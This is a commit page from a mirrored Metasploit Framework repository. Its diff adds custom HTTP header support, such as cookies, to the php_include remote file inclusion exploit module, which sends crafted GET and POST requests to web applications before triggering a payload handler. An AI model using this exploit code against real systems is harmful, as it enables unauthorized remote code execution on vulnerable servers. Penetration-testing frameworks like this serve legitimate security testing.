infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Added headers support to php_include module

unstable
ethicalhack3r 2012-10-05 23:00:38 +02:00
parent a60851e9d1
commit f4e442bcbd
1 changed files with 20 additions and 10 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

30
modules/exploits/unix/webapp/php_include.rb
View File

@ -1,5 +1,5 @@
## ##
# $Id$ # $Id: php_include.rb 14774 2012-02-21 01:42:17Z rapid7 $
## ##
## ##
@ -29,7 +29,7 @@ class Metasploit3 < Msf::Exploit::Remote
}, },
'Author' => [ 'hdm' , 'egypt', 'ethicalhack3r' ], 'Author' => [ 'hdm' , 'egypt', 'ethicalhack3r' ],
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
'Version' => '$Revision$', 'Version' => '$Revision: 14774 $',
#'References' => [ ], #'References' => [ ],
'Privileged' => false, 'Privileged' => false,
'Payload' => 'Payload' =>
@ -57,6 +57,7 @@ class Metasploit3 < Msf::Exploit::Remote
OptString.new('PATH', [ true , "The base directory to prepend to the URL to try", '/']), OptString.new('PATH', [ true , "The base directory to prepend to the URL to try", '/']),
OptString.new('PHPURI', [false, "The URI to request, with the include parameter changed to XXpathXX"]), OptString.new('PHPURI', [false, "The URI to request, with the include parameter changed to XXpathXX"]),
OptString.new('POSTDATA', [false, "The POST data to send, with the include parameter changed to XXpathXX"]), OptString.new('POSTDATA', [false, "The POST data to send, with the include parameter changed to XXpathXX"]),
OptString.new('HEADERS', [false, "Any additional HTTP headers to send, cookies for example. Format: \"header:value,header2:value2\""]),
OptPath.new('PHPRFIDB', [false, "A local file containing a list of URLs to try, with XXpathXX replacing the URL", OptPath.new('PHPRFIDB', [false, "A local file containing a list of URLs to try, with XXpathXX replacing the URL",
File.join(Msf::Config.install_root, "data", "exploits", "php", "rfi-locations.dat") File.join(Msf::Config.install_root, "data", "exploits", "php", "rfi-locations.dat")
]) ])
@ -69,9 +70,7 @@ class Metasploit3 < Msf::Exploit::Remote
uri.gsub!(/\?.*/, "") uri.gsub!(/\?.*/, "")
print_status("Checking uri #{uri}") print_status("Checking uri #{uri}")
response = send_request_raw({ 'uri' => uri}) response = send_request_raw({ 'uri' => uri})
if response.code == 200 return Exploit::CheckCode::Detected if response.code == 200
return Exploit::CheckCode::Detected
end
print_error("Server responded with #{response.code}") print_error("Server responded with #{response.code}")
return Exploit::CheckCode::Safe return Exploit::CheckCode::Safe
else else
@ -79,8 +78,19 @@ class Metasploit3 < Msf::Exploit::Remote
end end
end end
def php_exploit def datastore_headers
headers = datastore['HEADERS'] ? datastore['HEADERS'].dup : ""
headers_hash = Hash.new
if (headers and ! headers.empty?)
headers.split(',').each do |header|
key,value = header.split(':')
headers_hash[key] = value.strip
end
end
headers_hash
end
def php_exploit
uris = [] uris = []
tpath = datastore['PATH'] tpath = datastore['PATH']
@ -129,6 +139,7 @@ class Metasploit3 < Msf::Exploit::Remote
response = send_request_raw( { response = send_request_raw( {
'global' => true, 'global' => true,
'uri' => tpath+uri, 'uri' => tpath+uri,
'headers' => datastore_headers,
}, timeout) }, timeout)
elsif http_method == "POST" elsif http_method == "POST"
response = send_request_raw( response = send_request_raw(
@ -137,11 +148,10 @@ class Metasploit3 < Msf::Exploit::Remote
'uri' => tpath+uri, 'uri' => tpath+uri,
'method' => http_method, 'method' => http_method,
'data' => postdata, 'data' => postdata,
'headers' => 'headers' => datastore_headers.merge({
{
'Content-Type' => 'application/x-www-form-urlencoded', 'Content-Type' => 'application/x-www-form-urlencoded',
'Content-Length' => postdata.length, 'Content-Length' => postdata.length
} })
}, timeout) }, timeout)
end end
handler handler